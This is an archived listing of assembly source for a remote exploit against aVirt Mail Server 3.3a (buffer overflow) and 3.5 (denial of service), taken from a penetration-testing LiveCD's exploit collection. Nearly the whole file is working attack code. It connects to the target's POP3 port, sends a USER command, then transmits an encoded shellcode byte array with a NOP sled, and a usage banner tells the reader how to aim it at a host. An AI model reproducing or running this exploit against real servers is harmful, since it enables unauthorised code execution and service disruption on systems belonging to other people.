home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / avirt / MY.ASM.txt < prev   
Text File  |  2005-02-12  |  7KB  |  238 lines
  1. ;========================================================================
  2. ; This is the source code of Avirt 3.3a Buffer oVerflow                 =
  3. ; or Avirt 3.5 D.O.S                                                    =
  4. ; Source by: Luck Martins , USSR                                        =
  5. ; www.ussrback.com                                                      =
  6. ;                                                                       =
  7. ;Recomendation: dont read this Source :), or you can get Crazzzy!!!     =
  8. ;========================================================================
  9.  
  10. .386p
  11. locals
  12. jumps
  13. .model flat, stdcall
  14.  
  15. extrn   GetCommandLineA:PROC
  16. extrn   GetStdHandle:PROC
  17. extrn   WriteConsoleA:PROC
  18. extrn   ExitProcess:PROC
  19. extrn   WSAStartup:PROC
  20. extrn   connect:PROC
  21. extrn   send:PROC
  22. extrn   recv:PROC
  23. extrn   WSACleanup:PROC
  24. extrn   htons:PROC
  25. extrn   socket:PROC
  26. extrn   inet_addr:PROC
  27. extrn   closesocket:PROC
  28. Extrn    GetModuleHandleA          : PROC
  29. Extrn    GetProcAddress              : PROC
  30. Extrn    lstrlenA              : PROC
  31.  
  32. .data
  33.  
  34.  
  35. sploit_code label byte
  36.  DB 80,65,83,83,32,139,241,102,129,238,144,2,176,48,51,201,102,185,71,2
  37.  DB 102,49,6,102,70,226,249,144,144,144,144,144,144,144,144,144,144,144,144,144
  38.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  39.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  40.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  41.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  42.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  43.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  44.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
  45.  DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,216,48,48
  46.  DB 48,48,109,177,221,21,32,112,48,177,244,48,51,48,48,3,240,3,235,3
  47.  DB 198,3,207,3,226,3,249,188,248,152,52,69,62,187,181,166,33,112,48,187
  48.  DB 173,129,33,112,48,219,60,187,181,162,33,112,48,187,173,157,33,112,48,219
  49.  DB 60,106,106,106,106,106,106,106,106,106,106,106,106,189,189,170,33,112,48,97
  50.  DB 96,207,227,185,181,153,33,112,48,188,248,152,52,69,62,187,181,166,33,112
  51.  DB 48,187,173,129,33,112,48,219,60,187,181,162,33,112,48,187,173,157,33,112
  52.  DB 48,189,189,244,33,112,48,97,96,207,227,185,181,225,33,112,48,189,181,133
  53.  DB 33,112,48,96,207,165,225,33,112,48,185,181,240,33,112,48,189,189,229,33
  54.  DB 112,48,97,207,133,240,33,112,48,207,165,153,33,112,48,185,181,209,33,112
  55.  DB 48,188,248,152,52,69,56,187,181,166,33,112,48,219,54,187,181,162,33,112
  56.  DB 48,189,189,213,33,112,48,97,96,207,165,153,33,112,48,185,181,221,33,112
  57.  DB 48,219,48,188,248,152,52,69,56,187,181,166,33,112,48,219,54,187,181,162
  58.  DB 33,112,48,189,189,193,33,112,48,97,96,207,165,153,33,112,48,185,181,206
  59.  DB 33,112,48,189,181,50,34,112,48,96,90,48,90,48,189,181,122,33,112,48
  60.  DB 96,90,48,90,48,187,181,206,33,112,48,207,224,219,206,80,216,48,48,48
  61.  DB 48,109,177,221,96,33,112,48,88,32,48,52,48,189,173,43,34,112,48,99
  62.  DB 189,173,30,34,112,48,99,90,48,207,165,209,33,112,48,90,51,189,133,54
  63.  DB 34,112,48,102,207,165,221,33,112,48,81,242,32,48,123,117,98,126,117,124
  64.  DB 3,2,30,84,92,92,48,48,48,199,143,48,48,192,71,119,85,68,96,66
  65.  DB 95,83,113,84,84,66,85,67,67,48,48,48,48,48,152,93,199,143,32,112
  66.  DB 193,71,101,99,117,98,3,2,30,116,124,124,48,48,48,48,48,124,95,81
  67.  DB 84,124,89,82,66,81,66,73,113,48,48,48,48,48,125,85,67,67,81,87
  68.  DB 85,114,95,72,113,48,48,48,48,48,103,89,94,117,72,85,83,48,48,48
  69.  DB 48,48,115,66,85,81,68,85,100,88,66,85,81,84,48,48,48,48,48,48
  70.  DB 48,48,48,108,71,89,94,84,95,71,67,108,94,95,68,85,64,81,84,30
  71.  DB 85,72,85,48,105,95,69,16,113,66,85,16,117,72,64,92,95,89,68,85
  72.  DB 84,30,48,96,81,68,83,88,16,68,88,89,67,16,64,66,95,87,66,81
  73.  DB 93,16,64,92,85,81,67,85,30,30,30,30,30,30,30,48,48,48,48,48
  74.  DB 48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,176,222,84
  75.  DB 1,97,33,97,97,97,97,97,97,97,97,97,97,97,97,97,97,0,193,4
  76.  DB 0,0,193,4,0,0,193,4,0,190,32,32,32,32,176,48,102,185,71,2
  77.  DB 102,46,103,49,4,102,70,226,247,0,1,84,222,176
  78.  
  79. sploit_code_length   equ     $-sploit_code
  80.  
  81. senduser        db 'USER itsme',13,10
  82. senduserl       equ  $-senduser
  83.  
  84. Copy            db "aVirt Mail Server 3.3a Remote Oveflow.", 13, 10
  85.                 db "or aVirt Mail Server 3.5 Denial of Service", 13, 10
  86.                 db "by: Luck Martins, Ussr",13,10
  87.                 db "for source code or binary go to: http://www.ussrback.com/avirtro",13,10,13,10
  88.                 db "Usage: AvirtExp HostIp", 13, 10
  89.                 db "Example: AvirtExp 205.488.47.6",13,10,0
  90. Copyl        equ $-Copy
  91.  
  92. wsadescription_len equ 256
  93. wsasys_status_len equ 128
  94.  
  95. WSAdata struct
  96. wVersion dw ?
  97. wHighVersion dw ?
  98. szDescription db wsadescription_len+1 dup (?)
  99. szSystemStatus db wsasys_status_len+1 dup (?)
  100. iMaxSockets dw ?
  101. iMaxUdpDg dw ?
  102. lpVendorInfo dw ?
  103. WSAdata ends
  104.  
  105. sockaddr_in struct
  106. sin_family dw ?
  107. sin_port dw ?
  108. sin_addr dd ?
  109. sin_zero db 8 dup (0)
  110. sockaddr_in ends
  111.  
  112. wsadata WSAdata
  113. sin sockaddr_in
  114. sock dd ?
  115. numbase dd 10
  116. hostParamether db 256 dup (?)
  117. buffer dd 1000 dup (0)
  118. buffer2 dd 1000 dup (0)
  119.  
  120. i_cant_connect    db 'fata: sorry i can',27h,'t connect to this host!',13,10
  121. i_cant_connectl equ $-i_cant_connect
  122.  
  123. SendingExploit    db 'ok!: Sending exploit code....',13,10
  124. SendingExploitl equ $-SendingExploit
  125.  
  126. include code.inc
  127.  
  128. cchWritten dd 0
  129. ConHandle dd 0
  130.  
  131. .code
  132. start:
  133.     xor    eax,eax
  134.     xor    ebx,ebx
  135.     xor    edx,edx
  136.     xor    ecx,ecx
  137.     xor    esi,esi
  138.     xor    edi,edi
  139.     xor    ebp,ebp
  140.     Push    -11
  141.     Call    GetStdHandle
  142.     Mov    [ConHandle],EAX
  143.     call    GetCommandLineA
  144.     mov    edi, eax
  145.     mov    ecx, -1
  146.     xor    al, al
  147.     push    edi
  148.     repnz    scasb
  149.     not    ecx
  150.     pop    edi
  151.     mov    al, 20h
  152.     repnz    scasb
  153.     dec    ecx
  154.     mov    esi, edi
  155.     cmp    byte ptr [esi],0
  156.     je    no_command_line
  157.     cmp    byte ptr [esi],20
  158.     je    incrementa1
  159. continue:
  160.         lea     edi, hostParamether
  161.     rep    movsb
  162.     push    offset wsadata
  163.     push    0101h
  164.     call    WSAStartup
  165.     xor    eax, eax
  166.     push    eax
  167.     inc    eax
  168.     push    eax
  169.     inc    eax
  170.     push    eax
  171.     call    socket
  172.     mov    sock, eax
  173.     mov    sin.sin_family, 2
  174.     mov    eax,110d
  175.     push    eax
  176.     call    htons
  177.  
  178.     mov    sin.sin_port, ax
  179.         push    offset hostParamether
  180.     call    inet_addr
  181.  
  182.     mov    sin.sin_addr, eax
  183.     push    size sin
  184.     push    offset sin
  185.     push    sock
  186.     call    connect
  187.     or    eax, eax
  188.     jz    connectionworking
  189.     Write_Console <offset i_cant_connect > <i_cant_connectl >
  190.     jmp    the_end
  191. incrementa1:
  192.     inc   si
  193.     jmp   continue
  194. connectionworking:
  195.     xor    eax, eax
  196.     push    eax
  197.     push    1000
  198.     push    offset buffer
  199.     push    sock
  200.     call    recv
  201.         push    offset buffer
  202.     call    lstrlenA
  203.     Write_Console <offset buffer  > <eax >
  204.         Write_Console <offset SendingExploit > <SendingExploitl >
  205.         xor     eax, eax
  206.     push    eax
  207.     push    senduserl
  208.     push    offset senduser
  209.     push    sock
  210.     call    send
  211.         xor     eax, eax
  212.     push    eax
  213.     push    1000
  214.         push    offset buffer2
  215.     push    sock
  216.     call    recv
  217.         push    offset buffer
  218.     call    lstrlenA
  219.     Write_Console <offset buffer  > <eax >
  220.         xor     eax, eax
  221.     push    eax
  222.     push    sploit_code_length
  223.     push    offset sploit_code
  224.     push    sock
  225.     call    send
  226. the_end:
  227.     push    sock
  228.     call    closesocket
  229.     call    WSACleanup
  230. final_exit:
  231.     push    0
  232.     call    ExitProcess
  233. no_command_line:
  234.     Write_Console <offset Copy > <Copyl >
  235.     jmp   final_exit
  236. end start
  237.  
  238.